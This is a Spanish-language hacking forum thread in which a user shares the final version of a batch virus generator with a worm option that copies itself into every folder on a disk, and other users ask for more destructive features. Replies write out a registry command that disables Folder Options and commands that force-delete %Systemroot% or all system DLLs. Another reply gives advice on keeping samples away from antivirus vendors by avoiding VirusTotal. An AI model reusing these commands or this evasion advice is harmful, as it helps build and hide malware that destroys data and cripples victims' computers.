Imagen

Descarga
[Enlace externo eliminado para invitados]

Bueno, esta es la ultima version, no lo actualizare mas pq ya tiene lo necesario, he suprimido el Form2 y lo he dejado todo en uno, sobre la opcion de Convertir a Gusano, lo q hace es, se copia con el nombre q escribieron en el TextBox a Todas las carpetas del Disco, si, exactamente todas pq lo he probado , y bueno nd mas, espero q les guste
tiene buena pinta compañero, pero para mi gusto tienes muchas opciones de deshabilitar, estaria bueno que le pusieras mas opciones de borrado y/o infección, recuerda que genera virus!, pero muy buen trabajo de verdad

SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
jaja gracias de nuevo men, me alegra k lo hayas mejorado, por cierto me puedes decir el code batch para lo de las carpetas? me tiene intrigado....
Los policias contra los hackers son exactamente igual que la iglesia contra los sabios, ambos castigan la inteligencia....
jaj, el code es

Código: Seleccionar todo

Reg Add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t Reg_Dword /d 1 /f
Aunque me parece q tiene muchas opciones, es decir, me gustaria manejarlo con Tabstrip asi queda mas ordenado pero se me complica un poco el uso con eso.
grax men, sera de utilidad
Los policias contra los hackers son exactamente igual que la iglesia contra los sabios, ambos castigan la inteligencia....
No es una pega, es una duda... en donde dice desabilitar, no seria deshabilitar, con h????

bueno, x todo lo dmas sta perfecto! Se agradece el aporte! un Saludo!
La tecnica esta cambiando el mundo. Este es el momento para elegir, si es un Yo o un Nosotros.
Imagen

Estado: Agarrando offset por los huevos!!
qzwxsa escribió:Si creo el virus pero no lo abro, me infecta? xD
Le pego?¿

Respondiendo, el constructor del virus no te infecta ni al crearlo, lo que crea despues es lo k te infecta si lo abres
danielcanijo escribió:
qzwxsa escribió:Si creo el virus pero no lo abro, me infecta? xD
Le pego?¿

Respondiendo, el constructor del virus no te infecta ni al crearlo, lo que crea despues es lo k te infecta si lo abres

Quedó OK el Generador ! Me recuerda a terabit ja.....
Si, tiene muchas cosas que deshabilita pero le faltan opciones para hacer que el virus haga
daño como borrar archivos importantes del sistema y archivos personales "(Con este ultimo no estoy de acuerdo porque es peligroso y hace mucho daño con archivos personales que no se recuperan jamas y solo lo hacen los delincuentes informáticos)" pero igual ya esta demasiado bien.

yo le agregaria un:
del /f /s /q "%Systemroot%" o que solo elimine dll

Gracias
Imagen

Mostrar/Ocultar

muy buena herramienta, solo que muy maliciosa en malas manos
salu2
1º lección: Nunca subas tu server/stub.. loqsea a VIRUS TOTAL, --> Súbelo a NOVIRUSTHANKS --> http://scanner.novirusthanks.org/ --> y dale un tick en la casilla de abajo que dice : Do not distribute the sample
Se Busca "profesor"/"alguien" que se comprometa a enseñar c/c++ (programación), (a pesar de estar aprendiendo por mi cuenta mediante cursos y tutos como todo el mundo) yo le ayudaria en lo que pudiese, pm si alguien se ofrece
"yo le agregaria un:
del /f /s /q "%Systemroot%" o que solo elimine dll"

Si no me equivoco el codigo es

cd %Systemroot% (o %windir%)
del /f /s /q *.dll

Lo unico k veo peligroso aki es la propagacion usb, lo demas es modificacion de registro y borrar archivos sobre todo
ola ADX gracias por tu code de batch generador amigo yo se que tu eres de CPH bueno amigo estoy haciendo el mio tanto lo termine lo comparto a todas las comunidades
Responder

Volver a “Nuestros Programas”